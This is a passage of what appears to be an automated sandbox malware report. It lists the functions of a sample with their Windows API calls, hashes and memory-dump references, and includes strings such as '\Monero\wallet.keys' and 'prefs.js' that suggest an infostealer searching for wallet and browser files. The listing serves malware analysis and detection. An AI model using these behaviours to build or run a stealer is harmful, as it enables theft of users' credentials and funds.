                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 1f8f78f73df8984fd677c121f489525a1b6d14b7a854d63bba3a63949c2e86c3
                            • Instruction ID: 1c9851524d3a46a07e54c9cf09b10a4e042e50cb6df4b42e34462f20129292e3
                            • Opcode Fuzzy Hash: 1f8f78f73df8984fd677c121f489525a1b6d14b7a854d63bba3a63949c2e86c3
                            • Instruction Fuzzy Hash: AD617972500219ABCB64EBA0EC49EFE777CBB89701F04C588B60D96040EB74EB85CF95
                            Function 00574570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00574580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00574587
                            • wsprintfA.USER32 ref: 005745A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 005745BD
                            • StrCmpCA.SHLWAPI(?,00580FC4), ref: 005745EB
                            • StrCmpCA.SHLWAPI(?,00580FC8), ref: 00574601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0057468B
                            • FindClose.KERNEL32(000000FF), ref: 005746A0
                            • lstrcat.KERNEL32(?,00E4EA98), ref: 005746C5
                            • lstrcat.KERNEL32(?,00E4D8A0), ref: 005746D8
                            • lstrlen.KERNEL32(?), ref: 005746E5
                            • lstrlen.KERNEL32(?), ref: 005746F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 08b178b30e9d82345e4234fb03940021ba6303ebd33402834ac456b045359ca8
                            • Instruction ID: 1a022198979c7d3016c220072df92997f024df76443faa355d08c40916bf66aa
                            • Opcode Fuzzy Hash: 08b178b30e9d82345e4234fb03940021ba6303ebd33402834ac456b045359ca8
                            • Instruction Fuzzy Hash: DA5155B1540219ABC765EB70DC89FEE777CBB98300F408588B61D92090EB789B84CF95
                            Function 00573EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00573EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00573EDA
                            • StrCmpCA.SHLWAPI(?,00580FAC), ref: 00573F08
                            • StrCmpCA.SHLWAPI(?,00580FB0), ref: 00573F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0057406C
                            • FindClose.KERNEL32(000000FF), ref: 00574081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: e6f687f7b3333a2dbd2cae369ffd47693f6342a55eda0976b19eb5d18a56d660
                            • Instruction ID: 1805a6d500a18c022fd8aae72a52fc8f6bc37e79f11754f618d0dad34bb3ab51
                            • Opcode Fuzzy Hash: e6f687f7b3333a2dbd2cae369ffd47693f6342a55eda0976b19eb5d18a56d660
                            • Instruction Fuzzy Hash: 7C5146B2900219ABCB65EBB0DC49EFA777CBBC4300F40C588B65D96040DB799B89DF55
                            Function 0056ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0056ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0056ED55
                            • StrCmpCA.SHLWAPI(?,00581538), ref: 0056EDAB
                            • StrCmpCA.SHLWAPI(?,0058153C), ref: 0056EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0056F2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: ca8c83018b246a9fddd96cfa2966d081ebeb9f9750c357103da70bb464eaf1ac
                            • Instruction ID: fb83a28f542b2ef42436f223a0a19a87f2eca66b2e89dcbf099e8becbb20b13c
                            • Opcode Fuzzy Hash: ca8c83018b246a9fddd96cfa2966d081ebeb9f9750c357103da70bb464eaf1ac
                            • Instruction Fuzzy Hash: 16E1F0729111199ADB54FB60EC56EEE7B38BFD4300F408199B51E62092EF306F8ADF52
                            Function 0056F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005815B8,00580D96), ref: 0056F71E
                            • StrCmpCA.SHLWAPI(?,005815BC), ref: 0056F76F
                            • StrCmpCA.SHLWAPI(?,005815C0), ref: 0056F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0056FAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 54a80a959ee25509197b12f9fd1f530068a1cc136667e57efcfc4b27317a12bd
                            • Instruction ID: 8cd8552d1d6a2ebf3a78e09f1fd8c52bf521a9f11ba78a4dee152fb2127013a1
                            • Opcode Fuzzy Hash: 54a80a959ee25509197b12f9fd1f530068a1cc136667e57efcfc4b27317a12bd
                            • Instruction Fuzzy Hash: E0B140719001159BCB24FB64EC5AAEE7B79BFD4300F40C5A8A40E97185EF306B49DF92
                            Function 005616D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0058510C,?,?,?,005851B4,?,?,00000000,?,00000000), ref: 00561923
                            • StrCmpCA.SHLWAPI(?,0058525C), ref: 00561973
                            • StrCmpCA.SHLWAPI(?,00585304), ref: 00561989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00561D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00561DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00561E20
                            • FindClose.KERNEL32(000000FF), ref: 00561E32
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 5a8616ac9db1565244a9b695e748cd6aa4bff392b959c07b4a742c53fed040a7
                            • Instruction ID: 56b966113663f57eb00ce36391560e46e15046d6de0c48bf6ae3e4586ae6e596
                            • Opcode Fuzzy Hash: 5a8616ac9db1565244a9b695e748cd6aa4bff392b959c07b4a742c53fed040a7
                            • Instruction Fuzzy Hash: B11210719101199ACB15FB60EC9AEEE7B78BFD4300F408199B51E62091EF306F89DF92
                            Function 0056DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00580C2E), ref: 0056DE5E
                            • StrCmpCA.SHLWAPI(?,005814C8), ref: 0056DEAE
                            • StrCmpCA.SHLWAPI(?,005814CC), ref: 0056DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0056E3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: a2925b632a7b0b17f33d85f959aaa51d61179cd945ba5ca38a956bef5a8176ec
                            • Instruction ID: 58c79d3ba1f06a7414564d99d5c465cd6bd95b122daf7f46bbe13adf4bd4c14d
                            • Opcode Fuzzy Hash: a2925b632a7b0b17f33d85f959aaa51d61179cd945ba5ca38a956bef5a8176ec
                            • Instruction Fuzzy Hash: D5F1AF718101199ADB15FB60EC9AEEE7738BFD4300F8081D9A51E62091EF346F4ADF66
                            Function 00940884 Relevance: 14.1, Strings: 10, Instructions: 1636COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !zg$2z>$7)e$$<z}g$B~$Jv/~$Ssu#$]=.$,{:$tW~
                            • API String ID: 0-4076039871
                            • Opcode ID: b83ea4b43d12a9aac30ea83d901fe9556b01ebad84b0cbf784c446e6853a39d0
                            • Instruction ID: b7bc94f0c8a4c1d3dfb03fc87ac0fe259324e1b2cd6292866cbf4b94d507b0b5
                            • Opcode Fuzzy Hash: b83ea4b43d12a9aac30ea83d901fe9556b01ebad84b0cbf784c446e6853a39d0
                            • Instruction Fuzzy Hash: 2EB228F360C204AFE3046E2DEC85A7AF7E9EF94720F1A853DE6C4C7744EA3558058696
                            Function 0056DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005814B0,00580C2A), ref: 0056DAEB
                            • StrCmpCA.SHLWAPI(?,005814B4), ref: 0056DB33
                            • StrCmpCA.SHLWAPI(?,005814B8), ref: 0056DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0056DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: b3062e3a54a9c0c00db63a6f08e9e302217a020cdd26181eb0f1b6da03d1401a
                            • Instruction ID: bb080df84530006395ffbcd9f29f2b28336b77f33092a64139a7026438e6cb50
                            • Opcode Fuzzy Hash: b3062e3a54a9c0c00db63a6f08e9e302217a020cdd26181eb0f1b6da03d1401a
                            • Instruction Fuzzy Hash: 46913472A00105A7CB14FB74EC5A9EE7B7CBBC4300F40C958B91A97195EE349B19DBA3
                            Function 00577B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,005805AF), ref: 00577BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00577BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00577C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00577C62
                            • LocalFree.KERNEL32(00000000), ref: 00577D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
